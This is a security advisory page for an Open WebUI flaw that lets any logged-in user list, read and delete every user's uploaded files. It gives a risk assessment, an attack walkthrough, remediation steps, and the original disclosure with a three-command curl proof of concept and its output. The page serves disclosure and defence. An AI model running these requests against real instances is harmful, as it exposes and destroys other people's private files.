CVE-2026-45301: open-webui: BOLA exposes all users' uploaded files

GHSA-r8wh-8m7r-fh33 HIGH CISA: ATTEND
Published May 14, 2026
CISO Take

Open WebUI's file API endpoints perform no ownership verification, allowing any authenticated user to enumerate, download, and delete every file uploaded by every other user on the platform. For organizations running shared Open WebUI instances — the standard deployment model for internal LLM chat platforms — this means proprietary documents, source code, credentials, and sensitive data uploaded by employees are fully visible and deletable by any peer account. The full proof-of-concept is embedded in the public advisory (three curl commands), making exploitation trivial with zero specialized knowledge; CVSS 8.1 with low attack complexity and low privileges required means treat this as actively exploitable from the moment any second user exists on your instance. Upgrade to open-webui 0.3.16 immediately; absent patching, disable file uploads or restrict the deployment to single-user access.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

High risk. CVSS 8.1 with network-accessible attack vector, low complexity, and low privilege requirement makes this exploitable by any registered user. The PoC is publicly embedded in the GitHub advisory — three curl commands covering list, read, and delete. Open WebUI is widely deployed as a shared internal LLM interface, meaning multi-user environments are universally affected. The 91 prior CVEs in this package indicate systemic security maturity concerns. While no CISA KEV listing exists, the trivial exploitation path and public PoC mean weaponization timeline is measured in hours, not days.

How does the attack unfold?

Initial Access
Attacker authenticates to the Open WebUI instance with any valid user account — a self-registered account, compromised credential, or malicious insider with standard user privileges.
AML.T0012
Discovery
Attacker issues GET /api/v1/files/ and receives a full JSON inventory of every file uploaded by every user on the platform, including filenames, UUIDs, uploader user IDs, and filesystem paths — no elevated privilege required.
AML.T0049
Collection
Attacker iterates over all returned file IDs and downloads file contents via GET /api/v1/files/{id}/content, exfiltrating proprietary documents, credentials, datasets, or sensitive data uploaded by other users to their AI chat sessions.
AML.T0085
Impact
Attacker issues DELETE /api/v1/files/{id} against targeted files to destroy data integrity, disrupt colleagues' AI workflows, or eliminate uploaded evidence of their own activity.
AML.T0025

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Open WebUI pip <= 0.3.15 0.3.16
143.3K Pushed 8d ago 77% patched ~5d to patch Full package profile →

Do you use Open WebUI? You're affected.

How severe is it?

CVSS 3.1
8.1 / 10
EPSS
0.3%
chance of exploitation in 30 days
Higher than 19% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI None
S Unchanged
C High
I High
A None

What should I do?

5 steps
  1. Upgrade to open-webui 0.3.16 which adds ownership-based permission checks to all file API endpoints.

  2. If immediate patching is blocked, disable file upload functionality or restrict the instance to a single trusted user.

  3. Audit HTTP access logs for GET /api/v1/files/ and GET /api/v1/files/{id}/content requests from non-admin accounts to detect prior exfiltration activity.

  4. Notify affected users that files they uploaded may have been accessed and initiate data breach assessment per your jurisdiction's notification requirements.

  5. Rotate any credentials or sensitive material that may have been uploaded to the platform.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 10 - Data and data governance
ISO 42001
A.6.2 - Data for AI systems — Access and use restrictions
NIST AI RMF
PROTECT-1.1 - AI system access is controlled and monitored
OWASP LLM Top 10
LLM06:2025 - Sensitive Information Disclosure

Frequently Asked Questions

What is CVE-2026-45301?

Open WebUI's file API endpoints perform no ownership verification, allowing any authenticated user to enumerate, download, and delete every file uploaded by every other user on the platform. For organizations running shared Open WebUI instances — the standard deployment model for internal LLM chat platforms — this means proprietary documents, source code, credentials, and sensitive data uploaded by employees are fully visible and deletable by any peer account. The full proof-of-concept is embedded in the public advisory (three curl commands), making exploitation trivial with zero specialized knowledge; CVSS 8.1 with low attack complexity and low privileges required means treat this as actively exploitable from the moment any second user exists on your instance. Upgrade to open-webui 0.3.16 immediately; absent patching, disable file uploads or restrict the deployment to single-user access.

Is CVE-2026-45301 actively exploited?

No confirmed active exploitation of CVE-2026-45301 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-45301?

1. Upgrade to open-webui 0.3.16 which adds ownership-based permission checks to all file API endpoints. 2. If immediate patching is blocked, disable file upload functionality or restrict the instance to a single trusted user. 3. Audit HTTP access logs for GET /api/v1/files/ and GET /api/v1/files/{id}/content requests from non-admin accounts to detect prior exfiltration activity. 4. Notify affected users that files they uploaded may have been accessed and initiate data breach assessment per your jurisdiction's notification requirements. 5. Rotate any credentials or sensitive material that may have been uploaded to the platform.

What systems are affected by CVE-2026-45301?

This vulnerability affects the following AI/ML architecture patterns: Shared LLM chat platforms, Internal AI assistant deployments, Document-augmented AI workflows, Multi-user AI collaboration environments.

What is the CVSS score for CVE-2026-45301?

CVE-2026-45301 has a CVSS v3.1 base score of 8.1 (HIGH). The EPSS exploitation probability is 0.27%.

What is the AI security impact?

Affected AI Architectures

Shared LLM chat platformsInternal AI assistant deploymentsDocument-augmented AI workflowsMulti-user AI collaboration environments

MITRE ATLAS Techniques

AML.T0012 Valid Accounts
AML.T0025 Exfiltration via Cyber Means
AML.T0049 Exploit Public-Facing Application
AML.T0085 Data from AI Services

Compliance Controls Affected

EU AI Act: Art. 10
ISO 42001: A.6.2
NIST AI RMF: PROTECT-1.1
OWASP LLM Top 10: LLM06:2025

What are the technical details?

Original Advisory

### Summary A missing permission check in all files related API endpoints allows any authenticated user to list, access and delete every file uploaded by every user to the platform. ### Details All `files/` related endpoints lack permission checks. #### Listing all files For example, let's see how file listing is implemented: https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L107-L110 https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/models/files.py#L26 Notice the endpoint depends only on an authenticated user check, no file filtering is done to match the uploaded files' `user_id` to the requesting user. This problem repeats itself throughout the various route implementations, allowing any user to perform actions on any file. Some note worthy functions: #### Accessing the content of any file https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L173-L193 #### Deleting any file https://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L224-L241 ### PoC #### Configuration 1. I ran a clean install of the latest version using one of the docker one-liners on an Ubuntu desktop: `docker run -d -p 3000:8080 -v ollama:/root/.ollama -v open-webui:/app/backend/data --name open-webui --restart always ghcr.io/open-webui/open-webui:ollama` 2. I created an admin user 3. I created a second user to act as the threat actor with no elevated permissions 4. Admin user uploaded `test.txt` in a conversation with model 5. Admin user uploaded `mydeepest_secret.docx` in a conversation with model #### Listing files uploaded by other users 1. Login to threat actor 2. Perform a GET request to `/api/v1/files/` ```sh curl -X 'GET' \ 'http://localhost:3000/api/v1/files/' \ -H 'accept: application/json' ``` ```json [ { "id": "b9733e9c-0714-4425-8915-d0361bf66dfc", "user_id": "c0c16e7a-6f81-4863-8b71-e56e2e389cf1", "filename": "b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt", "meta": { "name": "test.txt", "content_type": "text/plain", "size": 4, "path": "/app/backend/data/uploads/b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt" }, "created_at": 1724709202 }, { "id": "8f058e18-fec1-4b9f-bb4e-c17f39d03c98", "user_id": "c0c16e7a-6f81-4863-8b71-e56e2e389cf1", "filename": "8f058e18-fec1-4b9f-bb4e-c17f39d03c98_mydeepest_secret.docx", "meta": { "name": "mydeepest_secret.docx", "content_type": "application/vnd.openxmlformats-officedocument.wordprocessingml.document", "size": 6485, "path": "/app/backend/data/uploads/8f058e18-fec1-4b9f-bb4e-c17f39d03c98_mydeepest_secret.docx" }, "created_at": 1724710236 } ] ``` #### Accessing other users' file content 1. Login to threat actor 2. Perform a GET request to `/api/v1/files/{id}/content` ```sh curl -X 'GET' \ 'http://localhost:3000/api/v1/files/b9733e9c-0714-4425-8915-d0361bf66dfc/content' \ -H 'accept: application/json' ``` ``` wow ``` #### Deleting another user's uploaded file 1. Login to threat actor 2. Perform a DELETE request to `/api/v1/files/{id}` ```sh curl -X 'DELETE' \ 'http://localhost:3000/api/v1/files/8f058e18-fec1-4b9f-bb4e-c17f39d03c98' \ -H 'accept: application/json' ``` ```json { "message": "File deleted successfully" } ``` 3. We will verify this action by furthur listing all files as mentioned above: ```json [ { "id": "b9733e9c-0714-4425-8915-d0361bf66dfc", "user_id": "c0c16e7a-6f81-4863-8b71-e56e2e389cf1", "filename": "b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt", "meta": { "name": "test.txt", "content_type": "text/plain", "size": 4, "path": "/app/backend/data/uploads/b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt" }, "created_at": 1724709202 } ] ``` ### Impact Having access to user uploaded files, regardless of ownership or permission level, breaks the confidentiality of sensitive data stored by users. Furthermore, the ability to delete other user's uploaded files disrupts the integrity of the system. ### Personal Notice In case this submission does get recognized and numbered as a CVE I'd perfer to be credited by my full name - Yuval Gal, instead of my GitHub handle. Thanks in advance and have a good week (: ## Credits This vulnerability was reported by **Yuval Gal** (GitHub: @vi11ain).

Exploitation Scenario

A malicious insider or attacker with a compromised standard user account on a shared corporate Open WebUI instance authenticates with their credentials. They send a single GET to /api/v1/files/ and receive a full JSON inventory of every file uploaded by every colleague — filenames, file UUIDs, uploader user IDs, and filesystem paths. They iterate over the returned IDs, downloading content via GET /api/v1/files/{id}/content, harvesting proprietary documents, source code, credentials, or PII that colleagues uploaded to their AI chat sessions. Finally, to cover tracks or cause operational disruption, they issue DELETE requests against selected files, eliminating data and potentially destroying evidence of their access. The entire attack requires no AI/ML knowledge — only valid authentication and standard HTTP tooling.

Weaknesses (CWE)

CWE-284 — Improper Access Control: The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.

  • [Architecture and Design, Operation] Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.
  • [Architecture and Design] Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Timeline

Published
May 14, 2026
Last Modified
May 14, 2026
First Seen
May 15, 2026

Related Vulnerabilities